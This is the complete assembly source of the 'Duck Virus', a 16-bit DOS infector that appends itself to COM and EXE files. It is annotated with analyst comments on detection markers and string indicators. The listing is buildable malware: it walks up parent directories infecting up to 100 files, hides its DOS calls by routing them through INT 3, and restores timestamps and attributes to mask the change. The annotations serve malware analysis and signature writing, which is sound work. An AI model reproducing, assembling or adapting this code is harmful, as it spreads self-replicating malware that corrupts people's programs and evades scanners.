; Virus generated by Gý 0.70á
; Gý written by Dark Angel of Phalcon/Skism
; File: DUCK.ASM
; Duck Virus by White Shark
;
; ---------------------------------------------------------------------
; Analyst notes (16-bit real-mode DOS, TASM syntax, .COM carrier):
;   * Non-resident appending infector: only INT 21h/INT 3 service calls
;     and file writes are visible; no TSR call appears in this listing.
;   * Targets *.COM and *.EXE in the current directory, then walks up
;     through ".." until CHDIR fails or numinfect reaches 0064h.
;   * Infection markers checked by the code itself:
;       - EXE: initial-SP field of the header (offset 10h) equals id.
;       - COM: jump target at offset 1 + (heap-start+3) equals file size.
;   * No encryption or decoding loop is present in this listing, so the
;     body between start and heap is appended to hosts as-is.
;   * NOTE(review): "ý"/"á" look like code-page 437 bytes shown in a
;     different encoding - confirm the raw byte values against a sample
;     before building a byte signature from the text strings.
; ---------------------------------------------------------------------

id = 'DA'                               ; marker word; stored as initial SP of infected EXEs

.model tiny
.code

; Assemble with:
; TASM /m3 filename.ASM
; TLINK /t filename.OBJ
        org 0100h

carrier:
        db 0E9h,0,0 ; jmp start

; ---------------------------------------------------------------------
; start - entry point of the appended body.
; Computes its own load displacement into bp, saves host state, aliases
; INT 3 to the INT 21h handler, runs the directory walk, then hands
; control back to the host (COM or EXE path).
; bp is the displacement for every [bp+offset ...] reference below.
; ---------------------------------------------------------------------
start:
        mov bp, sp
        int 0003h                       ; interrupt pushes FLAGS, CS, IP; those words stay below sp after return
next:
        mov bp, ss:[bp-6]               ; read back the IP that was pushed (run-time address of next)
        sub bp, offset next             ; bp = run-time address - assembled address
        push es                         ; keep the segment registers the host was started with
        push ds
        push cs
        pop ds                          ; ds = es = cs for the file and string work below
        push cs
        pop es
        mov ah, 0047h ; Get directory
        lea si, [bp+offset origdir+1]   ; byte 0 of origdir is filled with '\' at exit_traverse
        mov dl, 0000h ; Default drive
        int 0021h
        lea dx, [bp+offset newDTA]
        mov ah, 001Ah ; Set DTA
        int 0021h                       ; find-first/next results now land in newDTA, not the PSP
        push ds
        push es
        mov ax, 3521h ; get int 21h handler
        int 0021h
        push es
        pop ds
        xchg bx, dx                     ; ds:dx = handler address that came back in es:bx
        mov ax, 2503h ; set int 3 = int 21h handler
        int 0021h                       ; from here on every "int 0003h" is a DOS service call
                                        ; NOTE(review): no call in this listing puts the INT 3
                                        ; vector back, so an INT 3 vector equal to the INT 21h
                                        ; vector after the host exits is a usable artefact.
                                        ; Scanners keyed on "int 21h" call sites will not see
                                        ; the file operations below - match on the AH/AX values.
        pop es
        pop ds
        lea di, [bp+offset origCSIP2]
        lea si, [bp+offset origCSIP]
        movsw                           ; copy 8 bytes of saved host data (origCSIP..origSPSS)
        movsw                           ; into the working copy (origCSIP2..origSPSS2), because
        movsw                           ; the first set is overwritten while infecting other files
        movsw
        mov byte ptr [bp+numinfect], 0000h
traverse_loop:
        lea dx, [bp+offset COMmask]
        call infect
        lea dx, [bp+offset EXEmask]
        call infect
        cmp [bp+numinfect], 0064h
        jae exit_traverse ; exit if enough infected
        mov ah, 003Bh ; CHDIR
        lea dx, [bp+offset dot_dot] ; go to previous dir
        int 0003h
        jnc traverse_loop ; loop if no error

exit_traverse:
        lea si, [bp+offset origdir]
        mov byte ptr [si], '\'          ; prefix the saved path so it is rooted
        mov ah, 003Bh ; restore directory
        xchg dx, si
        int 0003h
        pop ds                          ; matches the push es / push ds at entry
        pop es
        mov ah, 001Ah ; restore DTA to default
        mov dx, 0080h ; in the PSP
        int 0003h
        cmp sp, id                      ; sp is back at its entry value; it equals id only when
        je restore_EXE                  ; the host is an EXE whose header SP was set to id
restore_COM:
        mov di, 0100h
        push di                         ; return address for the ret below = host entry 0100h
        lea si, [bp+offset old3_2]
        mov cx, 0003h ; Caution: far from the most efficient
        rep movsb ; routine
                                        ; the host's first three bytes are back in memory
return:
        ret                             ; also the shared exit used by infect (jc return)
restore_EXE:
        mov ax, es
        add ax, 0010h                   ; es (PSP segment) + 10h paragraphs
        add cs:[bp+word ptr origCSIP2+2], ax    ; relocate saved CS
        add ax, cs:[bp+word ptr origSPSS2]      ; relocate saved SS
        cli                             ; no interrupts while SS:SP is being changed
        mov ss, ax
        mov sp, cs:[bp+word ptr origSPSS2+2]
        sti
        db 00EAh                        ; far-jump opcode; its operand is the 4 bytes that follow

; Saved host state. Layout is significant: origCSIP2+old3_2 (4 bytes) is
; the far-jump operand above and origSPSS2 follows, mirroring
; origCSIP+old3 / origSPSS, which the 8-byte copy in start depends on.
origCSIP2 db ?
old3_2 db ?,?,?
origSPSS2 dd ?

origCSIP db ?
old3 db 0cdh,20h,0                      ; carrier default: CDh 20h is the encoding of int 20h
origSPSS dd ?
; ---------------------------------------------------------------------
; infect - process every file matching the mask at ds:dx in the current
; directory.
; In:    dx = offset of an ASCIIZ file mask (COMmask or EXEmask)
;        bp = load displacement computed in start
; Out:   numinfect incremented once per file written
; Calls: DOS services through "int 0003h" (vector aliased to INT 21h
;        by start)
; Leaves through the "return" label defined outside this routine.
;
; Observable effects on a host file, as shown by the code below:
;   * attributes are cleared before the open and set back afterwards
;   * the file date/time read before writing is set back afterwards
;   * file length grows by heap-start bytes; the first 3 bytes (COM) or
;     the first 1Ah bytes (EXE header) are rewritten
; Timestamps and attributes therefore do not reveal the change; length
; and content hashes do.
; ---------------------------------------------------------------------
infect:
        mov ah, 004Eh ; find first
        mov cx, 0007h ; all files
findfirstnext:
        int 0003h
        jc return
        cmp word ptr [bp+newDTA+34], 'NA' ; Check if COMMAND.COM
                                        ; compares only the two bytes at DTA offset 34
                                        ; (5th-6th characters of the found name)
        mov ah, 004Fh ; Set up find next
                                        ; mov leaves the flags from the cmp intact for the jz
        jz findfirstnext ; Exit if so
        mov ax, 4300h                   ; get file attributes
        lea dx, [bp+newDTA+30]          ; DTA offset 30 = found file name
        int 0003h
        jc return
        push cx                         ; original attributes (popped at close)
        push dx                         ; file name pointer   (popped at close)
        mov ax, 4301h ; clear file attributes
        push ax ; save for later use
        xor cx, cx
        int 0003h                       ; a read-only attribute does not stop the write
        lea dx, [bp+newDTA+30]
        mov ax, 3D02h                   ; open, read/write
        int 0003h
        xchg ax, bx                     ; bx = file handle
        mov ax, 5700h ; get file time/date
        int 0003h
        push cx                         ; original time (popped at close)
        push dx                         ; original date (popped at close)
        mov ah, 003Fh                   ; read
        lea dx, [bp+offset readbuffer]
        mov cx, 001Ah                   ; 1Ah bytes: enough for the EXE header fields used below
        int 0003h
        xor cx, cx
        mov ax, 4202h                   ; seek to end of file
        cwd                             ; ah is 42h, so cwd gives dx = 0: offset cx:dx = 0 from end
        int 0003h                       ; dx:ax = file length
        cmp word ptr [bp+offset readbuffer], 'ZM'
        jz checkEXE
        ; ---- COM host ----
        mov cx, word ptr [bp+offset readbuffer+1] ; jmp location
        add cx, heap-start+3 ; convert to filesize
        cmp ax, cx ; equal if already infected
        jz jmp_close
        lea di, [bp+offset old3]
        lea si, [bp+offset readbuffer]
        movsw                           ; keep the host's first three bytes in old3
        movsb
        mov cx, 0003h                   ; cx doubles as the byte count written back later
        sub ax, cx
        mov word ptr [bp+offset readbuffer+1], ax       ; displacement = file length - 3
        mov dl, 00E9h
        mov byte ptr [bp+offset readbuffer], dl         ; near-jump opcode
        jmp short continue_infect
checkEXE:
        ; ---- EXE host ----
        cmp word ptr [bp+offset readbuffer+10h], id     ; header SP field == id means already marked
        jnz skipp
jmp_close:
        jmp close
skipp:
        lea si, [bp+readbuffer+14h]
        lea di, [bp+origCSIP]
        movsw ; Save original CS and IP
        movsw
        sub si, 000Ah                   ; back from header offset 18h to 0Eh
        movsw ; Save original SS and SP
        movsw
        push bx ; save file handle
        mov bx, word ptr [bp+readbuffer+8] ; Header size in paragraphs
        mov cl, 0004h
        shl bx, cl                      ; paragraphs -> bytes
        push dx ; Save file size on the
        push ax ; stack
        sub ax, bx ; File size - Header size
        sbb dx, 0000h ; DX:AX - BX -> DX:AX
        mov cx, 0010h
        div cx ; DX:AX/CX = AX Remainder DX
        mov word ptr [bp+readbuffer+0Eh], ax ; Para disp stack segment
        mov word ptr [bp+readbuffer+10h], id ; Initial SP
                                        ; this field is the EXE infection marker tested at checkEXE
        mov word ptr [bp+readbuffer+16h], ax ; Para disp CS in module.
        mov word ptr [bp+readbuffer+14h], dx ; IP Offset
        pop ax ; Filelength in DX:AX
        pop dx
        add ax, heap-start              ; length after the body is appended
        adc dx, 0000h
        mov cl, 0009h                   ; 2^9 = 512-byte pages
        push ax
        shr ax, cl
        ror dx, cl
        stc                             ; carry in adds one to the page count
        adc dx, ax
        pop ax
        and ah, 0001h                   ; ax = new length mod 512
        mov word ptr [bp+readbuffer+4], dx ; Fix-up the file size in
        mov word ptr [bp+readbuffer+2], ax ; the EXE header.
        pop bx ; restore file handle
        mov cx, 001Ah                   ; header bytes to write back
continue_infect:
        push cx ; save # bytes to write
        lea dx, [bp+offset start]
        mov ah, 0040h ; concatenate virus
        mov cx, heap-start              ; start..heap: code plus the text strings below
        int 0003h                       ; file pointer is at end of file from the 4202h seek
        xor dx, dx
        mov ax, 4200h                   ; seek to start of file
        xor cx, cx
        int 0003h
        lea dx, [bp+offset readbuffer]
        mov ah, 0040h                   ; write the patched first 3 / 1Ah bytes
        pop cx
        int 0003h
        inc [bp+numinfect]
close:
        mov ax, 5701h ; restore file time/date
        pop dx
        pop cx
        int 0003h
        mov ah, 003Eh                   ; close handle
        int 0003h
        pop ax ; restore file attributes
        pop dx ; get filename and
        pop cx ; attributes from stack
        int 0003h
        mov ah, 004Fh ; find next
        jmp findfirstnext

; Text below lies between start and heap, so it is part of the heap-start
; bytes appended to each host and can serve as string indicators.
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
creator db 'White Shark',0
virusname db 'Duck Virus',0
EXEmask db '*.EXE',0
COMmask db '*.COM',0
dot_dot db '..',0

; Scratch area past the written body: present in memory only, not in
; infected files (the write length is heap-start).
heap:
newDTA db 43 dup (?)                    ; find-first/next DTA
origdir db 65 dup (?)                   ; '\' + directory saved at entry
numinfect db ?                          ; files written during this run
readbuffer db 1ah dup (?)               ; first 1Ah bytes of the file being processed
endheap:
        end carrier